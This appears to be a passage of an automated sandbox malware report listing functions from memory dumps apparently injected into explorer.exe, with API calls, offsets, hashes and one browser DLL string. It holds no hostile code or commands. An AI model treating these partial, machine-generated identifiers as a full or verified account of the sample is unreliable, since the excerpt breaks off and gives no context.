                                                                                                                                                                                                                                                    Function 0E91A8F0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E91A91B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E91A910
                                                                                                                                                                                                                                                      • Part of subcall function 0E90E0B0: _getptd_noexit.LIBCMT ref: 0E90E0B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E91A9BE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E91A9C9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction ID: 241f97ffd83762c733d2731f669f1d9c8914f726a83552d2af5fdb5765276bc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E4148B2A1239D86CF249B11925027973A9F780BD5FC94196DFD817784D7B8CE81CF00
                                                                                                                                                                                                                                                    Function 0A049CF0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A049D1B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A049D10
                                                                                                                                                                                                                                                      • Part of subcall function 0A03D4B0: _getptd_noexit.LIBCMT ref: 0A03D4B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A049DBE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A049DC9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction ID: a5f6b9645c2a17ba7242e861041ce54d305457502e5066069cc6c37a9faffc06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3441FDF2A2069D82DFB4AF2291502BB66A4FB50BD5F894136DF9947688D738C552CB00
                                                                                                                                                                                                                                                    Function 0E8C9CF0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8C9D1B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8C9D10
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BD4B0: _getptd_noexit.LIBCMT ref: 0E8BD4B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8C9DBE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8C9DC9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction ID: 9fb9ee5278afcc28f8ba49852268a05c57677f8430acb491cfb1c1ee0c8df189
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40414572A10B9982DF259F1595502BD73A0F7D2B99FC8819EEF99E7AC8D738C941C300
                                                                                                                                                                                                                                                    Function 10D75F21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseFileNamefreemalloc
                                                                                                                                                                                                                                                    • String ID: opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 258845212-3610413643
                                                                                                                                                                                                                                                    • Opcode ID: c471ce5aa720f746ad59a63a1d6c8db54a48f185df293f8e029ef730c1dd1203
                                                                                                                                                                                                                                                    • Instruction ID: c40c93622759584f2f05c6858bfed311b01bd5e85e1157f8263e783216a14cec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c471ce5aa720f746ad59a63a1d6c8db54a48f185df293f8e029ef730c1dd1203
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3131EA332487918BE793EF69A4503D973A0EBC4BA9F858035CA8583654FB78C9869720
                                                                                                                                                                                                                                                    Function 0F4B5F21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseFileNamefreemalloc
                                                                                                                                                                                                                                                    • String ID: opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 258845212-3610413643
                                                                                                                                                                                                                                                    • Opcode ID: c471ce5aa720f746ad59a63a1d6c8db54a48f185df293f8e029ef730c1dd1203
                                                                                                                                                                                                                                                    • Instruction ID: c7c52f2f7d08d4fbf54050580b767acf93bab2744dabbe16c028bdb9713be20a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c471ce5aa720f746ad59a63a1d6c8db54a48f185df293f8e029ef730c1dd1203
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2031DB332447518BE7A3EF69A4503D973A0EBC4B69F898035CE8583755FB3CC946AB20
                                                                                                                                                                                                                                                    Function 0E905F21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule$CloseFileNamefreemalloc
                                                                                                                                                                                                                                                    • String ID: opera-browser.dll
                                                                                                                                                                                                                                                    • API String ID: 258845212-3610413643
                                                                                                                                                                                                                                                    • Opcode ID: 2cfdfd9ed2f31ed9fc695fc228c9d291685299b20e94cf8aa63f1e8e26046a36
                                                                                                                                                                                                                                                    • Instruction ID: 43c886234ddaa93794c3841197d336d9cab6439f087d0ed8b78f21eb2d57cd67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cfdfd9ed2f31ed9fc695fc228c9d291685299b20e94cf8aa63f1e8e26046a36
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 343108332447918BEB93EF69A4503D973A4EBC4B64F858034CB8583694FB3CCD869B20
                                                                                                                                                                                                                                                    Function 10D862F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D8631E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D86313
                                                                                                                                                                                                                                                      • Part of subcall function 10D7E0B0: _getptd_noexit.LIBCMT ref: 10D7E0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10D8639D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D863AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D863B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction ID: adcf9e363f230293b368c0dd8d9f6cd0f3d4b6fe974c240b6821f5a446f3a979
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E73157B2A143A183DB549B1995506BD33A0F748FF4BD8812BEBE807A84EB28D952C710
                                                                                                                                                                                                                                                    Function 0F4C62F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4C631E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4C6313
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BE0B0: _getptd_noexit.LIBCMT ref: 0F4BE0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F4C639D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4C63AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4C63B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction ID: 682d45c0ae7533599d790796d312cbeacfeea7571d59b972dfb23784168ae311
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B631387A6103A182CBA49B1691502FE7360F740BA5BC5912FDFDC0B796DB2CD592C784
                                                                                                                                                                                                                                                    Function 0C3756F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C37571E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C375713
                                                                                                                                                                                                                                                      • Part of subcall function 0C36D4B0: _getptd_noexit.LIBCMT ref: 0C36D4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C37579D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C3757AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C3757B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction ID: a275a362d8006da62869af14c9c6229fd670dcc8fd04d25e9090452fc3c5f5ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D31E372B353E5C2DB38DF1695502BD73A0F754BA5BA483269B9807A88DA2CC556CF00
                                                                                                                                                                                                                                                    Function 0E9162F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E91631E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E916313
                                                                                                                                                                                                                                                      • Part of subcall function 0E90E0B0: _getptd_noexit.LIBCMT ref: 0E90E0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E91639D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E9163AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E9163B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction ID: 0c68f8ecc9683db580d4cf8c7e09731907217bef0d3fe42ee8e9d1adfe39dadf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f8af8a261db6e38b5f505c6aa70b8922ee2f54d0480bb2b1ce44a9738bbfe42
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF312672E142B982DF24AB1695602BD73A4E780BA4BC4416AEFD4077C9EB28CD52CF40
                                                                                                                                                                                                                                                    Function 0A0456F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A04571E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A045713
                                                                                                                                                                                                                                                      • Part of subcall function 0A03D4B0: _getptd_noexit.LIBCMT ref: 0A03D4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0A04579D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A0457AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A0457B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction ID: 2752b28223ba9a2d865bb9d2f2108df605a102664ca28e2ff4d7f2efd141e5c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5312BB3A203ADC3CB649F15AA901BD73E0F740BE5F95413ADBD507A84DB28E952CB00
                                                                                                                                                                                                                                                    Function 0E8C56F8 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8C571E
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8C5713
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BD4B0: _getptd_noexit.LIBCMT ref: 0E8BD4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8C579D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8C57AE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8C57B9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction ID: 297662231c9e59304e1ddab1191cd725ea754cfe75654cc59099ba96be644d8a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc4d112e85240320e5662f9c6c93686b12c4a432bcdbfb27de77f371537a0de4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D312872A106A1C2DF249F16A5602BA73A0F745BA5BD4412EDBD897BC8DB38EDD1C700
                                                                                                                                                                                                                                                    Function 10D746D0 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 10D7472F
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: EnterCriticalSection.KERNEL32 ref: 10D688D8
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: RtlInitializeCriticalSection.NTDLL ref: 10D688E5
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcpyA.KERNEL32 ref: 10D6891A
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcpyA.KERNEL32 ref: 10D6893D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcatA.KERNEL32 ref: 10D6894D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrcatA.KERNEL32 ref: 10D6895D
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: LeaveCriticalSection.KERNEL32 ref: 10D689E4
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: memcpy.MSVCRT ref: 10D689FC
                                                                                                                                                                                                                                                      • Part of subcall function 10D68890: lstrlenA.KERNEL32 ref: 10D68A0A
                                                                                                                                                                                                                                                    • lstrcmp.KERNEL32 ref: 10D74756
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 10D747CA
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 10D747D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292776791-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction ID: e5d370c8677686a687c72d7a79f416d1becf424a349e04afa7cfab4681d97079
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA217C35209B81C6EB15DF65B84039AB7A5FB89B88F448525EAC947B24EF7CC045C740
                                                                                                                                                                                                                                                    Function 0F4B46D0 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32 ref: 0F4B472F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: EnterCriticalSection.KERNEL32 ref: 0F4A88D8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: RtlInitializeCriticalSection.NTDLL ref: 0F4A88E5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcpyA.KERNEL32 ref: 0F4A891A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcpyA.KERNEL32 ref: 0F4A893D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcatA.KERNEL32 ref: 0F4A894D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrcatA.KERNEL32 ref: 0F4A895D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: LeaveCriticalSection.KERNEL32 ref: 0F4A89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: memcpy.MSVCRT ref: 0F4A89FC
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A8890: lstrlenA.KERNEL32 ref: 0F4A8A0A
                                                                                                                                                                                                                                                    • lstrcmp.KERNEL32 ref: 0F4B4756
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0F4B47CA
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0F4B47D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292776791-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction ID: 2ab69f8c06db6eadc1ecd2a1b5c8c7910bc4f893d38a8187083a832b6b6bb30a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a9a003b6d83ef932cec7817b22a7d86cc9f880343597c6698ea15c7cd3c8d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01215125215B82C5EB20DF25B8503ABB7A5FB89B84F849129DE8A47B26DF3CC105D710
                                                                                                                                                                                                                                                    Function 0C372457 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0C372482
                                                                                                                                                                                                                                                    • __DestructExceptionObject.LIBCMT ref: 0C37250C
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C37245F
                                                                                                                                                                                                                                                      • Part of subcall function 0C3703AC: _getptd_noexit.LIBCMT ref: 0C3703B2
                                                                                                                                                                                                                                                      • Part of subcall function 0C3703AC: _amsg_exit.LIBCMT ref: 0C3703C2
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C372511
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C37251D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
